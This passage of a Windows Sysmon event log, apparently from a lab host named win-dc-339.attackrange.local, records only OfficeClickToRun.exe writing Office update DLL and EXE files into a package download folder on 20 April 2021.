Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FDATE.DLL2021-04-20 14:54:09.628 11241100x800000000000000064135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.628{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dll2021-04-20 14:54:09.628 11241100x800000000000000064134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.628{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vccorlib140.dll2021-04-20 14:54:09.628 11241100x800000000000000064133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.628{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ucrtbase.dll2021-04-20 14:54:09.612 11241100x800000000000000064132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dll2021-04-20 14:54:09.612 11241100x800000000000000064131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FBIBLIO.DLL2021-04-20 14:54:09.612 11241100x800000000000000064130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll2021-04-20 14:54:09.612 11241100x800000000000000064129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\WISC30.DLL2021-04-20 14:54:09.612 11241100x800000000000000064128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\VBAJET32.DLL2021-04-20 14:54:09.612 11241100x800000000000000064127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OPTINPS.DLL2021-04-20 14:54:09.612 11241100x800000000000000064126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VISSHE.DLL2021-04-20 14:54:09.612 11241100x800000000000000064125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\SKYPESERVER.EXE2021-04-20 14:54:09.612 11241100x800000000000000064124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\SFBAPPSDK.DLL2021-04-20 14:54:09.596 11241100x800000000000000064123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.596{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLL2021-04-20 14:54:09.596 11241100x800000000000000064122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.596{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\URLREDIR.DLL2021-04-20 14:54:09.596 11241100x800000000000000064121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.596{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msmgdsrv_xl.dll2021-04-20 14:54:09.596 11241100x800000000000000064120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.596{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.SqlServer.Configuration.SString.dll2021-04-20 14:54:09.503 11241100x800000000000000064119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\vcruntime140.dll2021-04-20 14:54:09.503 11241100x800000000000000064118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EURO\MSOEURO.DLL2021-04-20 14:54:09.503 11241100x800000000000000064117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\vccorlib140.dll2021-04-20 14:54:09.503 11241100x800000000000000064116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcp140.dll2021-04-20 14:54:09.503 11241100x800000000000000064115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\mfc140u.dll2021-04-20 14:54:09.503 11241100x800000000000000064114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\concrt140.dll2021-04-20 14:54:09.503 11241100x800000000000000064113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxbgt.dll2021-04-20 14:54:09.503 11241100x800000000000000064112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\scdec.dll2021-04-20 14:54:09.503 11241100x800000000000000064111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\react-native-sdk.dll2021-04-20 14:54:09.503 11241100x800000000000000064110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotelemetry.dll2021-04-20 14:54:09.503 11241100x800000000000000064109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoianetutil.dll2021-04-20 14:54:09.503 11241100x800000000000000064108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoetwres.dll2021-04-20 14:54:09.503 11241100x800000000000000064107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msix.dll2021-04-20 14:54:09.503 11241100x800000000000000064106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excelcnvpxy.dll2021-04-20 14:54:09.503 11241100x800000000000000064105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLCALL32.DLL2021-04-20 14:54:09.503 11241100x800000000000000064104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Office.Excel.DataModel.dll2021-04-20 14:54:09.503 11241100x800000000000000064103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Tabular.dll2021-04-20 14:54:09.503 11241100x800000000000000064102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.SPClient.Interfaces.dll2021-04-20 14:54:09.503 11241100x800000000000000064101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.dll2021-04-20 14:54:09.503 11241100x800000000000000064100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.Core.dll2021-04-20 14:54:09.503 11241100x800000000000000064099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.AdomdClient.dll2021-04-20 14:54:09.503 11241100x800000000000000064098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.ConnectionUI.dll2021-04-20 14:54:09.503 11241100x800000000000000064097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.ConnectionUI.Dialog.dll2021-04-20 14:54:09.362 11241100x800000000000000064096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.AnalysisServices.Excel.BackEnd.dll2021-04-20 14:54:09.362 11241100x800000000000000064095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.AnalysisServices.Common.dll2021-04-20 14:54:09.362 11241100x800000000000000064094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACETXT.DLL2021-04-20 14:54:09.362 11241100x800000000000000064093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODDBS.DLL2021-04-20 14:54:09.362 11241100x800000000000000064092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODATA.DLL2021-04-20 14:54:09.362 11241100x800000000000000064091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODEXL.DLL2021-04-20 14:54:09.362 11241100x800000000000000064090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCH.DLL2021-04-20 14:54:09.362 11241100x800000000000000064089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODTXT.DLL2021-04-20 14:54:09.362 11241100x800000000000000064088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140_1.dll2021-04-20 14:54:09.362 11241100x800000000000000064087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll2021-04-20 14:54:09.362 11241100x800000000000000064086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll2021-04-20 14:54:09.362 11241100x800000000000000064085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:09.347 11241100x800000000000000064084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:09.347 11241100x800000000000000064083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft 